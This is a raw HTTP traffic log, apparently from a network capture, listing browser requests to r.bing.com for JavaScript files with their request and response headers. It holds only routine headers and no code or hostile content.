ResponseHTTP/2.0 200
etag: 0x8DA8012871F1AB6
akamai-grn: 0.11fd4817.1708698347.24c56b46
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: wQmZQwuzNQKGWvk013IgpA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c313e5c9-001e-00b4-1db7-5589e4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 738
vary: Accept-Encoding
cache-control: public, no-transform, max-age=258430
expires: Sun, 03 Mar 2024 15:18:59 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d903
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/n21aGRCN5EKHB3qObygw029dyNU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: hRrTe9xFPcEQGLGPgVvjhw==
last-modified: Wed, 30 Jun 2021 06:36:05 GMT
etag: 0x8D93B91568DF318
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aeb01b40-201e-00c7-1643-25740c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, max-age=138538
expires: Sat, 02 Mar 2024 06:00:47 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d904
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 0ApKmxnWdlgJ/r3VvxbmFQ==
last-modified: Wed, 17 Aug 2022 05:18:49 GMT
etag: 0x8DA800FF7F6EFE0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 71519564-901e-00c2-08e6-05a6d7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 178
cache-control: public, no-transform, max-age=152052
expires: Sat, 02 Mar 2024 09:46:01 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d905
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: xl2SFLZCQEcsZUNAUSfMmA==
last-modified: Wed, 17 Aug 2022 06:06:36 GMT
etag: 0x8DA8016A4AEB24C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4bb5a7e6-401e-007e-6d6b-48d56d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 393
cache-control: public, no-transform, max-age=189543
expires: Sat, 02 Mar 2024 20:10:52 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d906
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DA80106D9140B6
akamai-grn: 0.ab777b5c.1709154426.de9baa
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: application/x-javascript; charset=utf-8
content-md5: rimZQyGjXssDEnuSlgMaJA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 157b03b8-601e-00f9-6832-3ce373000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 321
vary: Accept-Encoding
cache-control: public, no-transform, max-age=359189
expires: Mon, 04 Mar 2024 19:18:18 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d907
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/XJ8OmILbNhm0zU9tdkuGYeXVPRQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: Xt8joNCoAzvDiZoU/IVjdg==
last-modified: Wed, 17 Aug 2022 06:10:20 GMT
etag: 0x8DA80172A213C93
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 919b6132-e01e-002c-3bb9-2b0cfe000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=82035
expires: Fri, 01 Mar 2024 14:19:04 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d908
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rSmdN6tN5TS/1yEQ8Z6pNA==
last-modified: Wed, 17 Aug 2022 06:27:54 GMT
etag: 0x8DA80199E3F8B92
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 296163b1-b01e-006a-389d-619d02000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=161946
expires: Sat, 02 Mar 2024 12:30:55 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d909
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/9cuwOQ_qE7qTGKohzrf_gIjTlPI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DB728A53C05A59
akamai-grn: 0.95777b5c.1708761953.1c6438f3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: FXbNzL5WiMdS7y/N9ZEDfg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2316d413-901e-0009-5dad-3aa582000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1541
cache-control: public, no-transform, max-age=165456
expires: Sat, 02 Mar 2024 13:29:25 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d90a
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/Gw7eETSwe7GHmKwW1lRqGPQJXRo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: YJcbeBoyJrUd/JMws9hIjA==
last-modified: Thu, 15 Sep 2022 21:37:34 GMT
etag: 0x8DA97628074CD66
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5ebea17b-901e-0054-391a-f5af06000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1240
cache-control: public, no-transform, max-age=280519
expires: Sun, 03 Mar 2024 21:27:08 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d90b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: cbryIH17LuJqgju0sWrerw==
last-modified: Thu, 04 Jan 2024 20:52:59 GMT
etag: 0x8DC0D6722D2BE26
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: efff67f9-d01e-001e-51bf-4da9f2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 660
cache-control: public, no-transform, max-age=144578
expires: Sat, 02 Mar 2024 07:41:27 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d90c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rs/7b/xb/nj/jQ1w07qyCcc9l2abcuV-aLzD-d8.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Thu, 04 Jan 2024 12:52:43 GMT
x-eventid: 65df23aec20e4feeb36e870c2733acde
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E04F
x-as-suppresssetcookie: 1
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-a7I7ywIr+XN/D+OaQzo+oAry1+zCYqoj9rUgTd21td8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
cache-control: public, max-age=333660
expires: Mon, 04 Mar 2024 12:12:49 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d910
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yaTET5I1fmUKhVemn0wu5w==
last-modified: Wed, 14 Feb 2024 19:38:07 GMT
etag: 0x8DC2D947800DADE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d748b399-b01e-009e-5fa4-5f56f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.59281102.1707958541.fa28a6cc
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=78782
expires: Fri, 01 Mar 2024 13:24:51 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d911
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/Sjh4wvzd2Y3WP03lvCYB_XIB9oE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: w1xdZcMTTuH+DJKovz1ilQ==
last-modified: Wed, 14 Feb 2024 19:38:06 GMT
etag: 0x8DC2D9477CDCF2C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 819c4de8-401e-00a5-2eb5-5f1350000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 5652
cache-control: public, no-transform, max-age=341417
expires: Mon, 04 Mar 2024 14:22:06 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d912
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DB66791BAB4052
akamai-grn: 0.87777b5c.1708266378.7faeb411
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: zk7Mu+IZ+1Afv84KFZt8XQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 80eadbdb-a01e-0070-73ee-1e59a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 160
cache-control: public, no-transform, max-age=221024
expires: Sun, 03 Mar 2024 04:55:33 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d913
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/6wAY24H4bipydO7Ktbp3eT4KcVo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PnaLMTbK+G96gve7BHRwqg==
last-modified: Tue, 27 Feb 2024 16:20:12 GMT
etag: 0x8DC37AFF9BEA7E0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3880efd6-301e-0064-05db-69b4b2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=290815
expires: Mon, 04 Mar 2024 00:18:44 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d914
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/3US3nNU_RgsSNFm9Bzw6xgeuOHk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 3oJXdoKCccwZtecuhRR/nw==
last-modified: Thu, 09 Nov 2023 08:38:27 GMT
etag: 0x8DBE0FF3E5AED48
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 10452ed2-401e-001a-48df-2c818e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 621
cache-control: public, no-transform, max-age=333063
expires: Mon, 04 Mar 2024 12:02:52 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d915
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/-BEQ_TpHKH1ZqSGIHPUIMCXcsiY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 0TiIjNRNLrwOAaitrsQFkw==
last-modified: Wed, 10 Jan 2024 06:29:08 GMT
etag: 0x8DC11A57397D505
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ce84290d-601e-0046-5285-4971ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=321111
expires: Mon, 04 Mar 2024 08:43:40 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d916
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: fr82fvtvcsicFIwsSPlj7g==
last-modified: Fri, 11 Aug 2023 12:48:58 GMT
etag: 0x8DB9A6954A9FE01
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 10f713d3-901e-0044-1cc7-026a6e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 487
cache-control: public, no-transform, max-age=147620
expires: Sat, 02 Mar 2024 08:32:09 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d917
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
